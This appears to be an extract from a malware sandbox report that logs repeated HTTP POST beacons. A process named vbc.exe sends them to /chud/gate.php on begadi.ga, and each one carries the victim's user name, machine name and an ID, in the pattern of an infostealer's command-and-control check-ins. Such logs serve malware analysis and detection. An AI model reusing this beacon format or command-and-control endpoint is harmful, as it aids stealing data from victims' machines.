Dec 21, 2020 08:34:24.436786890 CET	755	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:24.495271921 CET	755	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:24.625037909 CET	755	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
103	192.168.2.22	49270	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:24.899039984 CET	756	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:24.958028078 CET	756	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:25.087898016 CET	757	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
104	192.168.2.22	49271	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:25.357431889 CET	757	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:25.416074038 CET	758	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:25.545367956 CET	758	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
105	192.168.2.22	49272	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:25.805294991 CET	759	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:25.868355036 CET	759	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:25.998563051 CET	759	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
106	192.168.2.22	49273	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:26.254643917 CET	760	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:26.319022894 CET	760	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:26.454014063 CET	761	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
107	192.168.2.22	49274	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:26.704233885 CET	762	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:26.765531063 CET	762	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:26.890527010 CET	762	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
108	192.168.2.22	49275	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:27.150378942 CET	763	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:27.209568977 CET	763	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:27.339107990 CET	764	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
109	192.168.2.22	49276	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:27.608122110 CET	764	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:27.667059898 CET	765	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:27.797705889 CET	765	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.22	49178	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:37.413851023 CET	630	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:37.471499920 CET	630	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:37.608020067 CET	630	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
110	192.168.2.22	49277	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:28.088721037 CET	766	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:28.152750969 CET	766	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:28.281017065 CET	766	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
111	192.168.2.22	49278	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:28.539100885 CET	767	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:28.601403952 CET	767	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:28.733896971 CET	768	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
112	192.168.2.22	49279	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:28.979676962 CET	768	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:29.041733980 CET	769	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:29.168517113 CET	769	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
113	192.168.2.22	49280	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:29.425875902 CET	770	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:29.484672070 CET	770	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:29.607996941 CET	770	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
114	192.168.2.22	49281	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:29.858239889 CET	771	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:29.917035103 CET	771	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:30.288893938 CET	772	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
115	192.168.2.22	49282	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:30.558439970 CET	773	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:30.624939919 CET	773	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:30.894017935 CET	773	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
116	192.168.2.22	49283	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:31.178416967 CET	774	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:31.235699892 CET	774	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:31.375859976 CET	774	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
117	192.168.2.22	49284	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:31.619491100 CET	775	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:31.676389933 CET	776	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:31.834973097 CET	776	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
118	192.168.2.22	49285	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:32.089106083 CET	777	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:32.147960901 CET	777	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:32.573481083 CET	777	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
119	192.168.2.22	49286	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:32.827429056 CET	778	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:32.884489059 CET	778	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:33.016665936 CET	779	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.22	49179	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:37.896116018 CET	631	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:37.961241007 CET	631	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:38.091372013 CET	632	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
120	192.168.2.22	49287	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:33.287630081 CET	779	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:33.347075939 CET	780	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:33.480139971 CET	780	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
121	192.168.2.22	49288	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:33.749305010 CET	781	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:33.811774969 CET	781	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
